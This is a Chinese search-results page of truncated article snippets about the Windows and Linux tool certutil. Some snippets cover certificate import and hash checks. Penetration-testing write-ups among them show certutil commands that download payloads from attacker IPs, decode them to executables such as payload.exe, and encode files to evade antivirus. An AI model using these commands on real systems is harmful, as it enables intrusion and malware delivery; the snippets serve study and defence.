展开

关键词

certutil 导入 CA 证书

安装证书管理工具 apt-get install libnss3-tools 导入证书 $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent -i ~/programs/goagent/local/CA.crt 如果输出: certutil: function failed: security library: bad database. $ mv ~/.pki/nssdb ~/.pki/nssdb.corrupted $ mkdir ~/.pki/nssdb $ chmod 700 ~/.pki/nssdb $ certutil -d sql:$HOME/.pki/nssdb -N 导入证书: $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent -i ~/programs

21820

certutil 导入 CA 证书

安装证书管理工具 apt-get install libnss3-tools 导入证书 $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent -i ~/programs/goagent/local/CA.crt 如果输出: certutil: function failed: security library: bad $ mv ~/.pki/nssdb ~/.pki/nssdb.corrupted $ mkdir ~/.pki/nssdb $ chmod 700 ~/.pki/nssdb $ certutil -d sql:$HOME/.pki/nssdb -N 导入证书: $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent -i ~/programs /goagent/local/CA.crt tips: 本文由wp2Blog导入,原文链接:http://devonios.com/certutil-%e5%af%bc%e5%85%a5-ca-%e8%

12040
  • 广告
    关闭

    腾讯云618采购季来袭!

    腾讯云618采购季:2核2G云服务器爆品秒杀低至18元!云产品首单0.8折起,企业用户购买域名1元起,还可一键领取6188元代金券,购后抽奖,iPhone、iPad等你拿!

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    干货 | Certutil在渗透中的利用和详解

    何为certutil certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。 这里我首先在命令行用certutil -?查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。 ? certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。 另外一种方法就是使用windows自带的分隔符&和|,本质上跟第一种方法一样,相当于执行了两次certutil certutil & certutil -urlcache -split -f http: 使用certutil下载文件有个弊端就是会产生缓存文件,用如下命令查看: certutil -urlcache * ? 执行删除缓存 certutil -urlcache * delete ?

    1.4K50

    干货 | Certutil在渗透中的利用和详解

    何为certutil certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。 这里我首先在命令行用certutil -?查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。 certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。 hash进行比对,使用certutil也能够获取hash值 certutil -hashfile mimikatz.exe MD5 //检验MD5certutil -hashfile mimikatz.exe :: powershell.exe spawns certutil.exe certutil.exe [*] Artifacts :: C:\Windows\Prefetch\CERTUTIL.EXE

    9220

    详细分析使用Certutil解码的Office恶意软件

    最近发现使用certutil进行解码的office恶意软件,这种恶意软件通过OLE机制落地通过BASE64编码的恶意软件,然后通过调用certutil来进行解码恶意软件,并通过宏来启动恶意软件,这样做主要是为了绕过杀软的检测点 在拼接出以后开始调用 certutil.exe 进行对WORD,VRE进行解码。 ? 下图为WORD.VRE被编码的格式。 ? certutil.exe 是微软自带的软件,阅读原文查看官方的介绍 其中的decode和encode可以实现对一个文件进行Base64的编码和解码。 ?

    45640

    Lync实验环境之证书颁发机构迁移

    备份源服务器 一、备份 CA 模板列表(仅企业 CA 需要) 使用 Certutil.exe 记录 CA 模板列表 键入 certutil.exe –catemplates > c:\catemplates.txt 使用 Certutil.exe 记录 CA 的 CSP 键入 certutil.exe –getreg ca\csp\* >c:\csp.txt,并按 Enter。 ? DBLogDirectory DBSystemDirectory DBTempDirectory 验证DBSessionCount ,在“数值数据”中,确认是64 还原证书模板列表 键入 certutil 例如,certutil -setcatemplates +Administrator,User,DomainController。 查看在备份 CA 模板列表过程中创建的模板的列表 certutil -setcatemplates +Administrator,User,DomainController,DirectoryEmailReplication

    40820

    哈希生成与文件验证

    [TOC] certutil 命令 描述:certutil用于备份证书服务下载查看缓存,管理Windows命令通过文件生成并显示加密哈希生成Hashfile,MD5,SHA1,SHA256,并且可以校验文件 下载) CertUtil -encode InFile OutFile certutil -encode cos.conf base64.txt # 输入长度 = 241 # 输出长度 = 392 # CertUtil: -encode 命令成功完成。 CertUtil -decode InFile OutFile certutil -decode base64.txt new.txt #解码 # 输入长度 = 392 # 输出长度 = 241 # CertUtil #3.文件下载(保存指定名称) certutil -urlcache -split -f https://github.com/weblogic.py test.py certutil -urlcache

    27032

    记录一次从弱口令到远程登陆

    既然可以执行命令,我这里尝试了hta上线和powershell上线,可能因为机器是腾讯云的缘故给我拦截了,于是请教了3h师傅,他和我说可以使用Windows系统中的Certutil/Bitsadmin/ Certutil: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 下载文件: certutil -urlcache ://192.168.1.108/base64.txt b64 & certutil -decode b64 C:\ProgramData\payload.exe & del b64 删除指定缓存: certutil -urlcache -split -f http://192.168.1.108/base64.txt delete 查看所有缓存: certutil -urlcache * 删除所有缓存 : certutil -urlcache * delete 于是使用CertUtil远程文件下载,首先看一下当前文件路径,然后将命令编码一下再执行。

    24430

    用Windows自带工具校验hash码

    不过Windows中还有一个命令行工具提供更强大的功能——certutil。 这时出现了黑窗口,我这里演示的文件名是 ideaIU-2018.1.exe,并且我要检验的是SHA256,输入命令: certutil -hashfile ideaIU-2018.1.exe sha256 certutil -hashfile filename sha1(如果不加最后一个参数,则默认是这个) certutil -hashfile filename md5 值得注意的是,filename 在替换为自己的文件名时,不要忘记后缀(系统可能会默认隐藏扩展名) 通过文件生成并显示加密哈希只是certutil的一个小功能,通过命令 certutil -?

    4.9K41

    centos上使用mail直接发送邮件

    -A -n "GeoTrust SSL CA" -t "C,," -d /root/.certs -i /root/.certs/163.crt certutil -A -n "GeoTrust Global CA" -t "C,," -d /root/.certs -i /root/.certs/163.crt certutil -A -n "GeoTrust SSL CA - G3" -t "Pu,Pu ,Pu" -d /root/.certs/./ -i /root/.certs/163.crt 注意,centos可能会碰到如下错误: certutil: command not found 查询哪些包可以提供certutil yum provides */certutil 安装即可 yum install nss-tools-3.67.0-6.el8_4.x86_64 以上操作完成之后,目录文件如下: ls /root/.certs/ certutil -L -d /root/.certs 配置/etc/mail.rc,添加如下内容 set from

    7010

    文件上传的一个骚操作(低权限+BypassAV)

    certutil证书: ? 还会被杀软报警: ? powershell也会被彻底封杀: ? 尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能) ? 此时,骚操作上场,windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码: 本地: Certutil -encode artifact.txt artifact.exe 或指定路径: Certutil -encode d:\artifact.txt d:\artifact.exe ? art.txt art.exe 或: Certutil -decode d:\art.txt d:\art.exe ? 此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例): ?

    47340

    记一次攻防演练tips | 攻防tips

    0x04 getshell 下马,上线 certutil -urlcache -split -f http://xx.xx.xx.xx/robots.txt C:\Users\admin\a.exe & certutil 如果目标机器较老,很可能不存在powershell,此时就需要使用一些老方法,即certutil certutil绕过360的方式网上已经有了(记一次渗透测试后引发的小扩展), 这里再提一个 certutil编码解码。 windows不像linux,自带base64编码解码,但是 certutil 可以 certutil -encode x.exe x.txt certutil -decode x.txt x.exe 通过编码指令将exe编码生成txt文件,然后通过 echo 写入,再调用 certutil 解码还原为PE文件 ?

    50160

    CentOS 7.4配置mailx基于465端口发送邮件

    smtp.exmail.qq.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > exmail_qq.crt [root@localhost ~]# certutil -A -n "GeoTrust SSL CA" -t "C,," -d /data/mail/certs/ -i exmail_qq.crt [root@localhost ~]# certutil -A -n "GeoTrust Global CA" -t "C,," -d /data/mail/certs/ -i exmail_qq.crt [root@localhost ~]# certutil -i exmail_qq.crt [root@localhost ~]# certutil -L -d /data/mail/certs/ 4、发送测试邮件 [root@localhost ~]#

    45830

    常见的windows下无文件落地攻击手法

    sct挺好玩的 4.certutil.exe的利用 Certutil.exe 是命令行程序,作为证书服务的一部分进行安装。 如果 certutil 在没有其他参数的证书颁发机构上运行,则它将显示当前的证书颁发机构配置。 如果在非证书颁发机构上运行 certutil,则该命令默认为运行 certutil [-dump] 命令。 certutil [options] [-dump] certutil [options] [-dump] file -decodehex 对十六进制编码的文件进行解码。 certutil [options] -encode infile outfile ok 我们可以利用certutil.exe从我们的远端c2中下载我们的恶意代码并执行它 也可以把我们的恶意代码通过base64

    1.5K20

    【玩转腾讯云】排障coscli下载文件报nethttp: TLS handshake timeout 握手超时

    Intern~1就是C:\Program Files\Internet Explorer\ 或者执行coscli前,执行下面这2句命令也可以下载、导入GlobalSign Root CA - R1证书 certutil -addstore root c:/Root-R1.crt 请注意,高版本系统的defender可能会拦截certutil命令。 一般来说找台网络好的机器执行certutil -generateSSTFromWU c:\WURoots.sst 把生成的.sst文件传输到网络隔离的机器(即不能自动更新受信任根证书的机器,比如没有分配外网的机器 media.kaspersky.com/utilities/CorporateUtilities/rootsupd.zip 如果是>2008R2的系统,powershell里也能搞定.sst导入 certutil ) $sstStore | Import-Certificate -CertStoreLocation Cert:\LocalMachine\Root 请注意,高版本系统的defender可能会拦截certutil

    351184

    【内网渗透】Windows下的内网传输技术

    Part.4 bitsadmin bitsadmin 除了脚本以外,windows还有自带的两个工具:bitsadmin和certutil。 Part.5 certutil certutil Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书,CertUtil的一个特性是能够从远程URL下载证书或任何其他文件 certutil -urlcache -split -f http://192.168.3.1/hash.exe ? 但是这种下载方法默认会留下缓存,下载完成后通过delete参数清除缓存: ?

    75930

    隐藏在证书文件中的PowerShell(一)

    使用Certutil工具,可将 .cer文件转换生成 .crt文件,以下就是 .crt的一个示例: ? 对工具 Certutil 的利用 Certutil是一个Windows下的多功能程序,可用来执行各种证书和服务操作。 Certutil不会验证要编码的二进制数据,也就是说,它能对任意文件进行编码。 一些Windows 下的可执行程序(PE文件)都能用Certutil工具来轻松完成编码,编码之后的格式,很多入侵检测和杀毒软件都无法识别。 这就是一种“known-bad”式的检测规则,因为PE文件经Certutil工具编码后存在固定格式,所以,按照这种格式来针对性的查找就行。

    38130

    Windows通过代码更新根证书

    我写了一段代码来更新根证书(先清空、再通过certutil -generateSSTFromWU联网更新拉取400多个根证书)#查看根证书dir cert:\\CurrentUser\dir cert: }#Get-ChildItem Cert:\LocalMachine\Root | Remove-Itemwhile( (Test-Path C:\WURoots.sst) -eq $false ){certutil ://windowscq-1251783334.cos.ap-chongqing.myqcloud.com/updroots.exe -outfile c:\windows\updroots.exe#certutil

    2530

    一次利用 Metasploit 进行特权提权,再到 2500 台主机的内网域渗透

    gbk 之后发现 10.xx.0.156 有一个域管的进程:tsklist /v 并且发现当前机器还有微软自带杀毒: 随后通过 Golang 做了一下免杀,然后让目标下载我们的 exe,通过 certutil 下载我们的 exe: 然后运行发现有问题: 然后我吧 exe 编码成 txt: certutil -encode main.exe main.txt 然后目标下载 txt 然后解码再运行: certutil.exe -urlcache -split -f http://redteam.red:80/download/main.txt certutil -decode main.txt main.exe 直接上线到

    21651

    扫码关注云+社区

    领取腾讯云代金券